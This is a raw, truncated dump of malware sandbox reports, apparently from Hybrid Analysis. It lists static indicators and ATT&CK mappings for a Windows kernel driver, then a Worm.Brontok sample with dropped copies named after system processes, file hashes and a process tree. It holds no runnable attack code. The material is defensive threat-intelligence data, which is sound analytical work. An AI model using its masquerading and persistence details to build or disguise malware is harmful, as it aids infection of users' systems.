"Found reference to API \"ZwCreateFile\" (Indicator: \"CreateFile\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API \"ZwCreateFile\" (Indicator: \"ZwCreateFile\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\" file has an entrypoint instructions - \"mov\tedi, edi,push\tebp,mov\tebp, esp,mov\teax, dword ptr [0x11e0c],test\teax, eax,mov\tecx, 0xbb40,je\t0x12c9c,cmp\teax, ecx,jne\t0x12cbf,mov\tedx, dword ptr [0x11b0c],mov\teax, 0x11e0c,shr\teax, 8,xor\teax, dword ptr [edx],and\teax, 0xffff,mov\tdword ptr [0x11e0c], eax,jne\t0x12cbf,mov\teax, ecx,mov\tdword ptr [0x11e0c], eax,not\teax,mov\tdword ptr [0x11e08], eax,pop\tebp,jmp\t0x118d4,adc\tbyte ptr [0], ch,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,jl\t0x12d0a,add\tbyte ptr [eax], al,mov\tbyte ptr [edx], bl,add\tbyte ptr [eax], al,or\tbyte ptr [0], ch,add\tbyte ptr [eax], al,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-220", "type": 2, "relevance": 1, "name": "Contains ability to create/control drivers (API string)", "description": "Found reference to API \"IoCreateDevice\" (Indicator: \"IoCreateDevice\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"KeStallExecutionProcessor\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"IoAllocateIrp\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"RtlInitUnicodeString\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"ZwReadFile\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"ZwQuerySystemInformation\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"KeInitializeEvent\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"ZwQueryInformationFile\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"IoCreateDevice\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"MmProbeAndLockPages\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"IoDeleteDevice\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"IoGetCurrentProcess\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"ExAllocatePoolWithTag\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"IoFreeIrp\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"KeGetCurrentThread\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"RtlAnsiStringToUnicodeString\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"IofCompleteRequest\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"IoDeleteSymbolicLink\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"KeSetEvent\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"KeWaitForSingleObject\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"ExFreePoolWithTag\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"RtlFreeUnicodeString\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"MmGetSystemRoutineAddress\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"IoAllocateMdl\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"IoCreateSymbolicLink\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"RtlInitAnsiString\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"ZwCreateFile\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"ObReferenceObjectByHandle\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"KeBugCheckEx\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"ObfDereferenceObject\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"ZwClose\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"IoFreeMdl\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found reference to API (Indicator: \"MmUnlockPages\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\" has an executable section named \"H3BDtqe\"\n \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\" has an executable section named \"INIT\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\" has an writable section named \".data\"\n \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\" has an writable section named \"INIT\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\" was detected as \"Visual C++ 2003 DLL -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"KeWaitForSingleObject\" (Indicator: \"WaitForSingleObject\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-89", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about the current system (API string)", "description": "Found reference to API \"ZwQuerySystemInformation\" (Indicator: \"QuerySystemInformation\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-534", "type": 2, "name": "Contains ability to read files (API string)", "description": "Found reference to API \"ZwReadFile\" (Indicator: \"ZwReadFile\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"ZwQueryInformationFile\" (Indicator: \"QueryInformationFile\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"IoGetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\HardDiskVolume%d\" (Indicator: \"\\Device\\\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found string \"\\Device\\Harddisk0\\DR0\" (Indicator: \"\\Device\\\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found string \"\\DosDevices\\v3disk\" (Indicator: \"\\DosDevices\\\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")\n Found string \"\\Device\\v3disk\" (Indicator: \"\\Device\\\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-463", "type": 2, "relevance": 1, "name": "Contains ability to delete device driver (API string)", "description": "Found reference to API \"IoDeleteDevice\" (Indicator: \"IoDeleteDevice\"; File: \"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\")", "origin": "File/Memory", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "ZwQueryInformationFile", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"85791eded0ca8c40e8923c03b952011e916fd1fdd117c28d9dc98da7f9c54e49\" has section name H3BDtqe with entropy \"6.31863733686\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}]}
80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434
https://hybrid-analysis.com/sample/80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434
Hybrid Analysis - Killers
{"size": 93728, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434", "sha256": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434", "av_detect": 87, "vx_family": "Worm.Brontok", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 140, "extracted_files": [{"name": "services.exe", "file_size": 93728, "sha256": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_size": 93728, "sha256": "13cc539fe941088a430807f0f5189bc2b32fa4d5ce0402a5455d6d7910350028", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4k51k4.exe", "file_size": 93728, "sha256": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_size": 93728, "sha256": "16cfb2482ebe97cbe98f0343c69c1be93ccf98c339b561e68f69d7ccfc6647f6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_size": 93728, "sha256": "9aa6eacc2a15916a93941c620cdcf8ae7034ff6d1f74862e473ef976046f0c7e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Empty.pif", "file_size": 93728, "sha256": "feeb91377e9bb07429be960286765facffe83a26fb2ea214f200e698c5a3cbae", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE.bin", "file_size": 93728, "sha256": "29d4c3e270de6266694c16a34275bda4eac87abceb1cca67ff55f764ffbc08a5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9C450.bin", "file_size": 93728, "sha256": "060f13b49d833ed1e349a53d3bd85ccdf83921e82edede0000cc6f8f349f104a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 93728, "sha256": "571db4ccc8951c5965bb63f7e371c954ed47fead415edff5d1653e1371cc3507", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_size": 93728, "sha256": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9C452.bin", "file_size": 93728, "sha256": "7dd2bde3297dac5d447294d9b4e40a751649ebfd4df352d9bdb53953e43bf7d6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_size": 93728, "sha256": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MrHelloween.scr", "file_size": 93728, "sha256": "41f54910b36cd2108c7548f58478bea0eb81d19e1cd5b203aa1805754cc905ab", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9C88D.bin", "file_size": 93728, "sha256": "8073b14596c439326dceb477dba13979d46dcc206ea6bcbe50654e3c81211ff7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9C740.bin", "file_size": 93728, "sha256": "4ab2001b8debc529d2cd9caba26c45287eb818a21b01cc2bf570a2ceb119d936", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_size": 93728, "sha256": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9C743.bin", "file_size": 93728, "sha256": "3e26b722b1d5932383dbeeb63943798112ac508b51f09e446cea3639e56671c1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Folder.htt", "file_size": 640, "sha256": "fe222b08327bbfb35cbd627c0526ba7b5755b02ce0a95823a4c0bf58e601d061", "type_tags": ["html"], "description": "HTML document, ASCII text, with CRLF line terminators", "runtime_process": "4k51k4.exe (PID: 6060)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Puisi.txt", "file_size": 442, "sha256": "660ecfcd91ba19959d0c348724da95d7fd6dd57359898e6e3bcce600ff3c797d", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lsass.exe", "file_size": 93728, "sha256": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_size": 93728, "sha256": "8073b14596c439326dceb477dba13979d46dcc206ea6bcbe50654e3c81211ff7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "winlogon.exe", "file_size": 93728, "sha256": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "smss.exe", "file_size": 93728, "sha256": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "csrss.exe", "file_size": 93728, "sha256": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_size": 93728, "sha256": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_size": 93728, "sha256": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9C889.bin", "file_size": 93728, "sha256": "6d8f057804ad9baa2a5be1c017951d02110d00d90db4cd4e156a34771f06430e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00005064", "name": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe", "normalized_path": "C:\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe", "sha256": "80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434"}, {"uid": "00000000-00006060", "parentuid": "00000000-00005064", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "060f13b49d833ed1e349a53d3bd85ccdf83921e82edede0000cc6f8f349f104a"}, {"uid": "00000000-00005952", "parentuid": "00000000-00006060", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "060f13b49d833ed1e349a53d3bd85ccdf83921e82edede0000cc6f8f349f104a"}, {"uid": "00000000-00005948", "parentuid": "00000000-00006060", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "7dd2bde3297dac5d447294d9b4e40a751649ebfd4df352d9bdb53953e43bf7d6"}, {"uid": "00000000-00006124", "parentuid": "00000000-00006060", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "585aef00b14bb0951a13c2b3206f4ff05a63fd810b9cea136ebc79f62cb94d73"}, {"uid": "00000000-00004240", "parentuid": "00000000-00006060", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "c1616128bf18241bc859ee414f69c18d43f2e3da5812cd2257e0a8b59210ac6e"}, {"uid": "00000000-00002852", "parentuid": "00000000-00004240", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "060f13b49d833ed1e349a53d3bd85ccdf83921e82edede0000cc6f8f349f104a"}, {"uid": "00000000-00003528", "parentuid": "00000000-00004240", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "7dd2bde3297dac5d447294d9b4e40a751649ebfd4df352d9bdb53953e43bf7d6"}, {"uid": "00000000-00003748", "parentuid": "00000000-00004240", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "585aef00b14bb0951a13c2b3206f4ff05a63fd810b9cea136ebc79f62cb94d73"}, {"uid": "00000000-00003560", "parentuid": "00000000-00004240", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "c1616128bf18241bc859ee414f69c18d43f2e3da5812cd2257e0a8b59210ac6e"}, {"uid": "00000000-00003216", "parentuid": "00000000-00004240", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8c45aca8ba6cc0a0678ea267307a3073a6fcb5c0fe5bee30c4a36a56c42d8209"}, {"uid": "00000000-00001860", "parentuid": "00000000-00004240", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "0514cb50277afa361e7eaefabaac863d2fe53743d008ca4da35a79bd394406a4"}, {"uid": "00000000-00001476", "parentuid": "00000000-00004240", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ca30650fd28438184409cde0e8edf5fc9c4cf65ed23b56356a0c559d67b578c3"}, {"uid": "00000000-00002828", "parentuid": "00000000-00006060", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8c45aca8ba6cc0a0678ea267307a3073a6fcb5c0fe5bee30c4a36a56c42d8209"}, {"uid": "00000000-00003032", "parentuid": "00000000-00002828", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "060f13b49d833ed1e349a53d3bd85ccdf83921e82edede0000cc6f8f349f104a"}, {"uid": "00000000-00002240", "parentuid": "00000000-00002828", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "7dd2bde3297dac5d447294d9b4e40a751649ebfd4df352d9bdb53953e43bf7d6"}, {"uid": "00000000-00001728", "parentuid": "00000000-00002828", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "585aef00b14bb0951a13c2b3206f4ff05a63fd810b9cea136ebc79f62cb94d73"}, {"uid": "00000000-00001888", "parentuid": "00000000-00002828", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "c1616128bf18241bc859ee414f69c18d43f2e3da5812cd2257e0a8b59210ac6e"}, {"uid": "00000000-00001480", "parentuid": "00000000-00002828", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8c45aca8ba6cc0a0678ea267307a3073a6fcb5c0fe5bee30c4a36a56c42d8209"}, {"uid": "00000000-00003948", "parentuid": "00000000-00002828", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "0514cb50277afa361e7eaefabaac863d2fe53743d008ca4da35a79bd394406a4"}, {"uid": "00000000-00002580", "parentuid": "00000000-00002828", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ca30650fd28438184409cde0e8edf5fc9c4cf65ed23b56356a0c559d67b578c3"}, {"uid": "00000000-00002816", "parentuid": "00000000-00006060", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "0514cb50277afa361e7eaefabaac863d2fe53743d008ca4da35a79bd394406a4"}, {"uid": "00000000-00003124", "parentuid": "00000000-00002816", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "060f13b49d833ed1e349a53d3bd85ccdf83921e82edede0000cc6f8f349f104a"}, {"uid": "00000000-00003232", "parentuid": "00000000-00002816", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "7dd2bde3297dac5d447294d9b4e40a751649ebfd4df352d9bdb53953e43bf7d6"}, {"uid": "00000000-00003796", "parentuid": "00000000-00002816", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "585aef00b14bb0951a13c2b3206f4ff05a63fd810b9cea136ebc79f62cb94d73"}, {"uid": "00000000-00001028", "parentuid": "00000000-00002816", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "c1616128bf18241bc859ee414f69c18d43f2e3da5812cd2257e0a8b59210ac6e"}, {"uid": "00000000-00003652", "parentuid": "00000000-00002816", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8c45aca8ba6cc0a0678ea267307a3073a6fcb5c0fe5bee30c4a36a56c42d8209"}, {"uid": "00000000-00001220", "parentuid": 